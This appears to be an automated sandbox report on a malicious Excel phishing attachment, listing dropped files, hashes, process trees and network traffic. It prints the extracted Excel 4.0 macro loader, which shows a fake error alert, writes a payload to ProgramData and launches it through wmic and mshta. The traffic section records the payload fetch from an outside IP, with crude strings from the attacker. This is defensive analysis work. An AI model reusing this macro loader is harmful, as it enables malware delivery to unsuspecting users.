                                                                                                                                    Entropy (8bit):3.95006375643621
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:ggPYV:rPYV
                                                                                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                                    C:\Users\user\Desktop\order 4544471372.xls (copy)
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:Microsoft Excel 2007+
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):155069
                                                                                                                                    Entropy (8bit):7.95786658122654
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:UU3HAnIoTFJ3AA3YqICxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEe:UkAIcFFAkIVahmlYOOeRnwNKIde14Q
                                                                                                                                    MD5:07145F1486F9558BEE707ABC21FD5CC1
                                                                                                                                    SHA1:27734E41E3D924005BA90DAA04615538EE2E8CA5
                                                                                                                                    SHA-256:1ED04CC0F0DB6AAC22E194014FE8EBB8490C2BAC5B8BD5B77ADA201C0BD93392
                                                                                                                                    SHA-512:72D181CA5D45488CBACD1BDD0979C86FFB8DC2B63A7B6D9BD32934C2B2DFD847E12B0B85622C8063292BA8D2DDE5C22CB80827A6ACD8A44FC382DA6010686939
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: PK..........!.z..d....w.......[Content_Types].xml ...(......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................N.0...H.C.+J.r@.5.....(.....7y..=.tA.nQ/Y......Lo...XBD.].U...W.Mk.5z-.Y.I8%.wP.5 ..ooz.u.,(.a.f).'.Q....|.G;...H...<.9.S.......%p.LY..{/0.....7...c.......h).%.N...~2.....K....B.. YS....?!%*..?..n...m.9....`.].[.*.lJ...xGf.!..>l....F....1..Kn...>.....".L.%.$..q..BF?tbl...v......P.....}...jK.{.O.....<..s....BO....bZ...<mS.F..YE.[.o...w+t.K]..}@....W...]....4......i.\m3.1.@.`.fl.........PK..........!..U0#...
                                                                                                                                    C:\Users\user\Desktop\~$order 4544471372.xls
                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    File Type:data
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):165
                                                                                                                                    Entropy (8bit):1.6081032063576088
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:RFXI6dtt:RJ1
                                                                                                                                    MD5:7AB76C81182111AC93ACF915CA8331D5
                                                                                                                                    SHA1:68B94B5D4C83A6FB415C8026AF61F3F8745E2559
                                                                                                                                    SHA-256:6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF
                                                                                                                                    SHA-512:A09AB74DE8A70886C22FB628BDB6A2D773D31402D4E721F9EE2F8CCEE23A569342FEECF1B85C1A25183DD370D1DFFFF75317F628F9B3AA363BBB60694F5362C7
                                                                                                                                    Malicious:true
                                                                                                                                    Preview: .pratesh ..p.r.a.t.e.s.h. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                    \Device\ConDrv
                                                                                                                                    Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                    File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):160
                                                                                                                                    Entropy (8bit):5.083203110114614
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1Mgk2Tfs36JQAiveyn:Yw7gJGWMXJXKSOdYiygKkXe/egk2LsqE
                                                                                                                                    MD5:F0FF7C0DB9FBFEA7E97F757B2DE48655
                                                                                                                                    SHA1:09AEFC1E69DF23FE6E02220C1AF0594F59AF8E0F
                                                                                                                                    SHA-256:327D5F15A71546595D8DAB851049B15D941A266DB6B90E855AEA6ADDBD8B45BE
                                                                                                                                    SHA-512:9588D9F00A7F63F5E065319404CB83C1C6D995361D913CB046817763C51F6C910A21524BE0B8844ED7030DC2D2563BCE289C0F362F85138D9DE8763F336B0F8B
                                                                                                                                    Malicious:false
                                                                                                                                    Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 6096;...ReturnValue = 0;..};....

                                                                                                                                    Static File Info

                                                                                                                                    General

                                                                                                                                    File type:Microsoft Excel 2007+
                                                                                                                                    Entropy (8bit):7.950279542064319
                                                                                                                                    TrID:
                                                                                                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 51.52%
                                                                                                                                    • Excel Microsoft Office Open XML Format document (40004/1) 40.40%
                                                                                                                                    • ZIP compressed archive (8000/1) 8.08%
                                                                                                                                    File name:order 4544471372.xls
                                                                                                                                    File size:153116
                                                                                                                                    MD5:531039a455e1f0598cd201b785a1152a
                                                                                                                                    SHA1:4880df9e94090243029e54a34e941c70298401c7
                                                                                                                                    SHA256:cf0d6ea61f8e56f80f24792e356adeab2f92b6db2f980a9e5932415484f5b732
                                                                                                                                    SHA512:5a74dd1f8391f9991e43b11ee8af2ca4ddc0b7045116451293f7fa2a5e0d90d9fac66f1eb8d766d03779d5adbeb0e2845709a2cce4663d70af875512e98b29f3
                                                                                                                                    SSDEEP:3072:9l0wcwAKQXICZPdxMlT0h4377gYllmQskO2UMXGVi2e/JjNxSan6NljwSWEx02lE:v0qAKeCahmlYOOeRnwNKIde14jd2
                                                                                                                                    File Content Preview:PK..........!.8v..............[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                    File Icon

                                                                                                                                    Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                    Static OLE Info

                                                                                                                                    General

                                                                                                                                    Document Type:OpenXML
                                                                                                                                    Number of OLE Files:1

                                                                                                                                    OLE File "order 4544471372.xls"

                                                                                                                                    Indicators

                                                                                                                                    Has Summary Info:
                                                                                                                                    Application Name:
                                                                                                                                    Encrypted Document:
                                                                                                                                    Contains Word Document Stream:
                                                                                                                                    Contains Workbook/Book Stream:
                                                                                                                                    Contains PowerPoint Document Stream:
                                                                                                                                    Contains Visio Document Stream:
                                                                                                                                    Contains ObjectPool Stream:
                                                                                                                                    Flash Objects Count:
                                                                                                                                    Contains VBA Macros:

                                                                                                                                    Macro 4.0 Code

                                                                                                                                    1,18,=B46-B52
                                                                                                                                    3,18,=U6*I71
                                                                                                                                    4,18,=B83*G21
                                                                                                                                    7,18,=B77*R92
                                                                                                                                    8,18,=W36-M75
                                                                                                                                    9,18,=B46-O46
                                                                                                                                    11,18,=U77-C57
                                                                                                                                    12,18,=E12-P4
                                                                                                                                    14,18,=ALERT("" & CHAR(69) & CHAR(114) & "ro" & CHAR(114) & "! S" & CHAR(101) & CHAR(110) & "ding " & CHAR(114) & "eport" & CHAR(32) & CHAR(116) & "o Mi" & CHAR(99) & "ros" & CHAR(111) & CHAR(102) & "t." & CHAR(46) & CHAR(46))
                                                                                                                                    15,18,=M14-U64
                                                                                                                                    17,18,=E84+W18
                                                                                                                                    18,18,=A24-C32
                                                                                                                                    20,18,=D23-B20
                                                                                                                                    21,18,=H56-A9
                                                                                                                                    22,18,=I25+E46
                                                                                                                                    23,18,=B36*X99
                                                                                                                                    25,18,=E47*D60
                                                                                                                                    29,18,=FOPEN("" & CHAR(67) & ":\ProgramData\tCeltZ." & CHAR(114) & "tf", 3)
                                                                                                                                    32,18,=H49+Y83
                                                                                                                                    38,18,=I28*Z36
                                                                                                                                    39,18,=FOR.CELL("nNwXHnQeUQ",Sheet1!BC161:BC5164, TRUE)
                                                                                                                                    42,18,=H4+Q85
                                                                                                                                    43,18,=T83*Y92
                                                                                                                                    45,18,=P53-Z33
                                                                                                                                    49,18,=Z74-U45
                                                                                                                                    51,18,=J16*G4
                                                                                                                                    52,18,=FWRITE(0,CHAR(nNwXHnQeUQ))
                                                                                                                                    54,18,=B78+K46
                                                                                                                                    57,18,=K76*U21
                                                                                                                                    58,18,=E59+I66
                                                                                                                                    59,18,=B76*H43
                                                                                                                                    61,18,=L9+M51
                                                                                                                                    62,18,=NEXT()
                                                                                                                                    63,18,=J93-Y76
                                                                                                                                    65,18,=O26+Z33
                                                                                                                                    67,18,=R40+R44
                                                                                                                                    70,18,=P71-K20
                                                                                                                                    72,18,=H56*M6
                                                                                                                                    73,18,=K100*A21
                                                                                                                                    74,18,=U56-N36
                                                                                                                                    76,18,=EXEC("wmic proces" & CHAR(115) & " call create " & CHAR(34) & "msh" & CHAR(116) & "a C:\Pro" & CHAR(103) & "ram" & CHAR(68) & "ata" & CHAR(92) & "tC" & CHAR(101) & "" & CHAR(108) & CHAR(116) & "Z.rtf" & CHAR(34))
                                                                                                                                    77,18,=I96-M97
                                                                                                                                    81,18,=B62+L66
                                                                                                                                    83,18,=Y51+X5
                                                                                                                                    89,18,=RETURN()
                                                                                                                                    

                                                                                                                                    Network Behavior

                                                                                                                                    Network Port Distribution

                                                                                                                                    TCP Packets

                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                    Dec 2, 2021 14:13:14.373107910 CET498168080192.168.2.7149.129.254.152
                                                                                                                                    Dec 2, 2021 14:13:14.652904987 CET808049816149.129.254.152192.168.2.7
                                                                                                                                    Dec 2, 2021 14:13:14.653083086 CET498168080192.168.2.7149.129.254.152
                                                                                                                                    Dec 2, 2021 14:13:14.653744936 CET498168080192.168.2.7149.129.254.152
                                                                                                                                    Dec 2, 2021 14:13:14.933520079 CET808049816149.129.254.152192.168.2.7
                                                                                                                                    Dec 2, 2021 14:13:15.302388906 CET808049816149.129.254.152192.168.2.7
                                                                                                                                    Dec 2, 2021 14:13:15.349163055 CET498168080192.168.2.7149.129.254.152

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • 149.129.254.152:8080

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.749816149.129.254.1528080C:\Windows\System32\mshta.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Dec 2, 2021 14:13:14.653744936 CET8517OUTGET /6tfcnfucknugget4gpenis3dade5z6cpc HTTP/1.1
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Language: en-US
                                                                                                                                    User-Agent: rape
                                                                                                                                    Host: 149.129.254.152:8080
                                                                                                                                    Dec 2, 2021 14:13:15.302388906 CET8518INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx/1.15.12
                                                                                                                                    Date: Thu, 02 Dec 2021 13:13:15 GMT
                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                    Content-Length: 10
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Data Raw: 68 69 20 77 61 6e 6b 65 72 73
                                                                                                                                    Data Ascii: hi wankers


                                                                                                                                    Code Manipulations

                                                                                                                                    Statistics

                                                                                                                                    CPU Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    Memory Usage

                                                                                                                                    Click to jump to process

                                                                                                                                    High Level Behavior Distribution

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Behavior

                                                                                                                                    Click to jump to process

                                                                                                                                    System Behavior

                                                                                                                                    General

                                                                                                                                    Start time:14:11:34
                                                                                                                                    Start date:02/12/2021
                                                                                                                                    Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                                    Imagebase:0x1030000
                                                                                                                                    File size:27110184 bytes
                                                                                                                                    MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:14:13:09
                                                                                                                                    Start date:02/12/2021
                                                                                                                                    Path:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:wmic process call create "mshta C:\ProgramData\tCeltZ.rtf"
                                                                                                                                    Imagebase:0xa30000
                                                                                                                                    File size:391680 bytes
                                                                                                                                    MD5 hash:79A01FCD1C8166C5642F37D1E0FB7BA8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:14:13:10
                                                                                                                                    Start date:02/12/2021
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff774ee0000
                                                                                                                                    File size:625664 bytes
                                                                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high

                                                                                                                                    General

                                                                                                                                    Start time:14:13:11
                                                                                                                                    Start date:02/12/2021
                                                                                                                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                    Imagebase:0x7ff6e70f0000
                                                                                                                                    File size:488448 bytes
                                                                                                                                    MD5 hash:A782A4ED336750D10B3CAF776AFE8E70
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:false
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    General

                                                                                                                                    Start time:14:13:11
                                                                                                                                    Start date:02/12/2021
                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:mshta C:\ProgramData\tCeltZ.rtf
                                                                                                                                    Imagebase:0x7ff6c7ab0000
                                                                                                                                    File size:14848 bytes
                                                                                                                                    MD5 hash:197FC97C6A843BEBB445C1D9C58DCBDB
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:moderate

                                                                                                                                    Disassembly

                                                                                                                                    Code Analysis

                                                                                                                                    Reset < >

                                                                                                                                      Executed Functions

                                                                                                                                      Non-executed Functions

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, Offset: 0F536000, based on PE: false
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: fd1531e996b852be85d572d55198bf9e42ab0f4ea833eab6257d41103592ec8a
                                                                                                                                      • Instruction ID: 04470fcd4b620fad51f5e8c452c4192000a84a47d750514587c7d8639d026409
                                                                                                                                      • Opcode Fuzzy Hash: fd1531e996b852be85d572d55198bf9e42ab0f4ea833eab6257d41103592ec8a
                                                                                                                                      • Instruction Fuzzy Hash: 1DE0929640E3C02FD30753210CAD6D06F217F63400F8E42CFE4858B0A3A2499A1F93B3
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000003.349574960.000000000F536000.00000004.00000001.sdmp, Offset: 0F536000, based on PE: false
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 75700e1c78e28708fd93adf8cef49ec3fecc6c9db26cce9673f2716847e3c132
                                                                                                                                      • Instruction ID: 01ee1148a4134e00c26fc81d255919a250756afe38d15b2eb24e07aa0dc856ac
                                                                                                                                      • Opcode Fuzzy Hash: 75700e1c78e28708fd93adf8cef49ec3fecc6c9db26cce9673f2716847e3c132
                                                                                                                                      • Instruction Fuzzy Hash: 49C0126310C3944FC60297387C505257F68ED83104B0608899840AB472C5103890C371
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%